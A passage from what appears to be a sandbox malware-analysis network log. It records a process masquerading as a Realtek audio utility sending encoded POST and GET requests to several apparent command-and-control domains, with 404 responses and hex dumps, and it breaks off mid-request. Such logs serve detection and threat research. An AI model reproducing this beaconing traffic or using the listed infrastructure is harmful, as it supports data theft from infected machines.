                                                                            Dec 3, 2024 18:58:04.994240999 CET1289INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:58:05 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                            Dec 3, 2024 18:58:04.994303942 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                            Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            50192.168.11.204979974.48.143.82807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:58:07.500086069 CET775OUTPOST /cpit/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.bpgroup.site
                                                                            Origin: http://www.bpgroup.site
                                                                            Referer: http://www.bpgroup.site/cpit/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 68 6f 44 69 42 73 6d 75 6c 79 2f 2f 6e 36 55 4e 58 45 7a 64 63 2b 55 6c 6e 2b 63 42 57 4b 64 70 77 47 6e 74 59 6b 4e 54 79 68 73 5a 78 69 4d 64 54 51 53 62 33 6b 50 61 34 74 72 39 44 4f 48 46 67 55 55 50 31 4c 7a 6f 33 6b 4e 6e 32 47 4a 36 6c 32 57 78 38 64 32 46 78 70 64 46 31 44 78 50 55 66 31 35 34 6b 6c 6b 57 2b 42 57 43 71 6b 38 6e 57 71 49 4f 73 61 46 77 59 49 73 31 2b 4b 2b 54 78 50 30 49 32 6a 2f 74 6c 58 30 65 4d 79 36 6a 4d 55 57 59 34 33 64 46 57 6b 52 65 68 67 75 42 38 6c 43 52 6b 68 69 51 66 74 45 56 30 41 52 65 58 63 6b 35 38 42 70 42 77 6c 4c 43 7a 76 38 70 4d 2f 41 31 72 33 63 41 64 39 72 34 45 34 55 77 6c 64 66 61 4d 63 3d
                                                                            Data Ascii: 2O=hoDiBsmuly//n6UNXEzdc+Uln+cBWKdpwGntYkNTyhsZxiMdTQSb3kPa4tr9DOHFgUUP1Lzo3kNn2GJ6l2Wx8d2FxpdF1DxPUf154klkW+BWCqk8nWqIOsaFwYIs1+K+TxP0I2j/tlX0eMy6jMUWY43dFWkRehguB8lCRkhiQftEV0AReXck58BpBwlLCzv8pM/A1r3cAd9r4E4UwldfaMc=
                                                                            Dec 3, 2024 18:58:07.690882921 CET1289INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:58:07 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                            Dec 3, 2024 18:58:07.691257954 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                            Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            51192.168.11.204980074.48.143.82807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:58:10.212886095 CET2578OUTPOST /cpit/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.bpgroup.site
                                                                            Origin: http://www.bpgroup.site
                                                                            Referer: http://www.bpgroup.site/cpit/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 68 6f 44 69 42 73 6d 75 6c 79 2f 2f 6e 36 55 4e 58 45 7a 64 63 2b 55 6c 6e 2b 63 42 57 4b 64 70 77 47 6e 74 59 6b 4e 54 79 68 55 5a 77 51 30 64 4a 7a 36 62 32 6b 50 61 35 74 72 34 44 4f 48 45 67 55 4d 4c 31 4c 4f 54 33 6e 31 6e 6e 55 42 36 79 79 4b 78 70 74 32 46 35 4a 64 45 37 6a 78 61 55 66 6c 39 34 67 42 6b 57 2b 42 57 43 70 73 38 7a 58 71 49 4d 73 61 45 39 49 4a 74 2f 65 4b 43 54 78 6e 43 49 32 6d 45 73 56 33 30 65 6f 75 36 75 61 67 57 56 34 33 66 56 47 6b 67 65 68 74 75 42 38 51 7a 52 6c 56 63 51 65 6c 45 52 53 4a 47 47 57 77 5a 6e 76 4e 43 4e 77 51 7a 47 52 6a 72 70 75 6a 33 31 39 76 62 44 6f 6c 47 39 33 30 62 73 33 64 6a 47 72 4b 33 58 6a 67 53 61 53 4c 64 43 78 76 75 34 79 46 69 63 46 55 71 67 67 73 76 34 63 33 39 6f 31 4d 70 6d 66 37 4e 42 2b 58 74 70 6e 37 30 6b 70 49 72 33 30 6a 31 6f 75 6d 38 38 52 76 57 32 53 59 43 62 36 71 4f 2f 39 73 33 4a 79 6f 62 44 43 58 6a 4d 5a 59 78 66 57 71 57 49 48 71 51 43 47 56 58 4f 66 43 46 65 37 31 39 45 69 77 42 31 42 57 65 35 46 78 70 38 61 48 [TRUNCATED]
                                                                            Data Ascii: 2O=hoDiBsmuly//n6UNXEzdc+Uln+cBWKdpwGntYkNTyhUZwQ0dJz6b2kPa5tr4DOHEgUML1LOT3n1nnUB6yyKxpt2F5JdE7jxaUfl94gBkW+BWCps8zXqIMsaE9IJt/eKCTxnCI2mEsV30eou6uagWV43fVGkgehtuB8QzRlVcQelERSJGGWwZnvNCNwQzGRjrpuj319vbDolG930bs3djGrK3XjgSaSLdCxvu4yFicFUqggsv4c39o1Mpmf7NB+Xtpn70kpIr30j1oum88RvW2SYCb6qO/9s3JyobDCXjMZYxfWqWIHqQCGVXOfCFe719EiwB1BWe5Fxp8aHQnUUpfyGsU5wlJCa/xjTgoZvtP8cZ9Zf0mxA9/m7AfbZHLcBR3AnWocJwV/sLVqUaqTTcO44yrQrUjr6thBrWRJ3OxSXTYdQXA0gQqG5qToqBxGXZ9UxjcI6zK13/NW9MXWEcA0fj6XnW2NsJdbfbq45wQKpNyimGSnqdfaiv79LgoYDQvR5CgunDTWzTF5nwrtrrbFL8Qcb8WKzbNA82wGK4LAoU6jk3d3SmC8/f03JjxLcIHnaYg6cf46qkUZ6+2/uVJFtJkieXXOTXAcHiiJhYLFoGNEXQ6P3t6t+9d6qNBei2bOvbKxN4NHn6UYikWYtOGLEk/OTCM2Qj9E/x+eT1V1z3KBh+y/ZNl7GRxMvhIh0FEjntGgEFbsVw31dHxW8hvwT5qRCfHlcGNZDkPpt7a+tC153nYCa3/UlXHTkbEZd5f5D+8Hk/leFjji3KMdDNOtz28Lkw1I124pEbiB2Z/TBi4K7wSgCft9mzK1QR2khdKgJHDUhPCNYreeuueGhNK5UH2BHDVk7F2pf3lU2NTt/K5JdhQlsGM5Wde4P+ROXbeWOQUIM/IEewZY8GTdK01J7Qa6Je9F8lM64dHcT38CRKQcPHgIbhdf2yHDeyfjBWdzEfMyUWc0HMDo1BnP/0BT6Yht11nef6yaTQA/FlJ+21k4YHc [TRUNCATED]
                                                                            Dec 3, 2024 18:58:10.213011026 CET5346OUTData Raw: 75 51 53 2b 54 53 78 70 34 73 56 63 66 73 59 69 4f 54 51 5a 30 42 67 46 73 73 64 4a 77 75 7a 69 65 6c 65 58 2f 36 55 34 63 70 32 77 4c 68 2b 4b 54 67 5a 79 69 41 57 2b 67 47 43 64 76 6b 61 50 37 4f 4c 52 49 66 44 66 4e 4f 6d 57 46 4a 54 72 34 6a
                                                                            Data Ascii: uQS+TSxp4sVcfsYiOTQZ0BgFssdJwuzieleX/6U4cp2wLh+KTgZyiAW+gGCdvkaP7OLRIfDfNOmWFJTr4j4aFvxDA1B5CA2oQaS5PATBtuNqXouaVtjCggK6kU51MilULs8QLf3MPnAQXuNalK9JNZ+SukfceCVFEn7sAxPeIeSKg3WJYyO+0PXCeA2ZYaBvBBfMPUXqpQKz0cAKhBki0bMhlkjwqXmoQHvYKFnGP+dkamJyZ+9
                                                                            Dec 3, 2024 18:58:10.401246071 CET1289INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:58:10 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                            Dec 3, 2024 18:58:10.401295900 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                            Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            52192.168.11.204980174.48.143.82807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:58:12.930947065 CET486OUTGET /cpit/?2O=sqrCCcTnmzrg1P4sAk/QU75pr5UiXpEX3HrYYQRUrHENwAM+UA+gtHvn9s/6e57/pGZInJKN/XxZ2ntAsziA3/X4179OogJSAfxe5UAmetVNY4oSlmiuZpQ=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.bpgroup.site
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:58:13.119966984 CET1289INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:58:13 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                            Dec 3, 2024 18:58:13.119992018 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                            Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            53192.168.11.2049806202.92.5.2380
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:58:44.448559046 CET488OUTGET /fev0/?ChhG6=J-xs&2O=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.thaor56.online
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:58:44.822220087 CET1289INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:58:44 GMT
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                            Dec 3, 2024 18:58:44.822318077 CET181INData Raw: 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73
                                                                            Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            54192.168.11.204980713.248.169.4880
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:58:49.983441114 CET767OUTPOST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 6f 31 4d 6c 4a 65 71 75 76 56 76 4c 55 58 58 66 78 47 66 4b 67 72 6f 45 4b 79 4e 77 78 64 65 4a 4f 41 3d 3d
                                                                            Data Ascii: 2O=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMo1MlJequvVvLUXXfxGfKgroEKyNwxdeJOA==


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            55192.168.11.204980813.248.169.4880
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:58:52.669116974 CET787OUTPOST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
